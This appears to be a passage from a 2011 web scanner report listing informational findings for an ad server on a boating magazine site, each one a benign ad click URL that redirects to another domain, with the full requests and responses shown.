Date: Tue, 25 Jan 2011 14:46:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020927039/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020927039/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020927039/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1027505259/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1027505259/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1027505259/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/103412299/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/103412299/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/103412299/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1036877118/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1036877118/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1036877118/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:55:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.122. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:03:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1074790821/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1074790821/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1074790821/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1075149581/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1075149581/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1075149581/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/107755770/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/107755770/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/107755770/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:58:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1078006695/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1078006695/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1078006695/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:08:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.128. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1100718932/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1100718932/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1100718932/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102181256/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102181256/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102181256/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

20.131. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102373340/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102373340/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

